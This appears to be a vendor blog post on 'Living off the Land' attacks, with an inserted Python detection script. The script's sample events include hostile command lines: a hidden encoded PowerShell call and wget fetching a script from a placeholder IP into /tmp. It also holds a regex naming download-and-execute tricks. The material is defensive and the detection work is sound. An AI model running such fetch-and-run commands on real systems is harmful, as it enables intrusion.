Attacks on your organization are bad enough when you’re able to quickly detect and stop them, but when they get in and just sit there, they can be downright scary. Lately, we're seeing a resurgence in threat actors leveraging an attack method called “Living off the Land”, or LotL.
In their 2020 Cyber Threatscape Report, Accenture provides a very clear picture of the increased use of LotL techniques by state-sponsored actors and other criminal groups. Essentially, adversaries are more often using legitimate admin tools to compromise secure environments undetected. The first access is typically accomplished by exploiting a vulnerability or tricking an end user. However, unlike a traditional non-LotL attack, where the threat actor gets the endpoint to install some software (an executable virus), in a LotL attack the adversary drops no new executable file.
Rather, the adversary uses tools already present on the victim’s machine, dropping at most malicious scripts or exploit code that turn those tools against their owner. On Windows, most LotL attacks use malicious PowerShell at some point, whereas on Linux a LotL attack on a web server may use a webshell written in PHP. LotL may even use wget to launch a superset of fileless attacks. All of these are whitelisted system admin tools. As the moniker Living off the Land would indicate, the attackers are in no rush to ‘cash in’, operating with a ‘canary in the coal mine’ perspective.
“If the canary is still alive in a month”, they know they’re good to continue their attack largely undetected. Once the threat actors have access to your environment, they can run almost anything. The malicious code can reside purely in the RAM of your endpoint, as above, or, once run via PowerShell, it can even reach a web server. The actor uses this undetected dwell time to learn the infected host’s environment, network, customers, and partners.
Why are Living off the Land attacks so successful?
Simply put, most detection solutions such as anti-virus, anti-spam gateways and next-generation firewalls fail to detect LotL: at best they classify the activity as ‘Potentially Unwanted Programs’ (PUPs) or ‘Potentially Unwanted Modifications’ (PUMs) and don’t block it. No alerting occurs because the applications involved are used routinely by legitimate users. When a PUP or PUM detection does fire, it is often lost among false positives. Threat actors leverage this lack of detection and dwell until threat hunting finds them.
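To make that detection gap concrete, here is an added example (my own, not the author's or any vendor's code) that scores constructed process-creation events by context rather than by which binary ran: the same wget or PowerShell is benign under an interactive shell but suspect when an Office application or a web server process spawns it. The event fields, rule names, process names and sample values are all assumptions.

```python
import re

# Constructed process-creation events (hypothetical, not from the article); the
# shape mirrors what Sysmon Event ID 1 / auditd execve records carry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe Get-ChildItem C:\Reports"},          # routine admin use
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc QQBCAEMA"},      # constructed, truncated blob
    {"parent": "apache2", "image": "wget",
     "cmd": "wget http://203.0.113.5/stage.sh -O /tmp/.s"},      # web server fetching a script
    {"parent": "bash", "image": "wget",
     "cmd": "wget https://example.org/release.tar.gz"},          # admin at a shell
    {"parent": "php-fpm", "image": "sh", "cmd": "sh -c id"},     # webshell-style child process
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm", "w3wp.exe"}
SHELLS_AND_FETCHERS = {"sh", "bash", "wget", "curl", "powershell.exe", "cmd.exe"}
# Encoded / hidden-window / in-memory download indicators commonly seen in LotL PowerShell
SUSPICIOUS_PS = re.compile(r"(-enc\w*|-w(indowstyle)?\s+hidden|DownloadString|IEX\b)", re.I)


def rules_for(event):
    """Return the names of the context rules an event trips; an empty list means benign."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmd"]
    hits = []
    if parent in OFFICE_APPS and image in {"powershell.exe", "cmd.exe"}:
        hits.append("office_spawns_shell")
    if image == "powershell.exe" and SUSPICIOUS_PS.search(cmd):
        hits.append("powershell_obfuscated_or_hidden")
    if parent in WEB_SERVERS and image in SHELLS_AND_FETCHERS:
        hits.append("web_server_spawns_shell_or_fetcher")
    return hits


def triage(events):
    """Map each flagged command line to its rule hits, skipping events no rule matched."""
    flagged = {}
    for event in events:
        hits = rules_for(event)
        if hits:
            flagged[event["cmd"]] = hits
    return flagged


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):55} {cmd}")
```

The two benign events fall through every rule, which is the point: the tool name alone never decides, the parent process and the command-line shape do.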
How can you manage the risk? Check out our Threat Insight report for more information.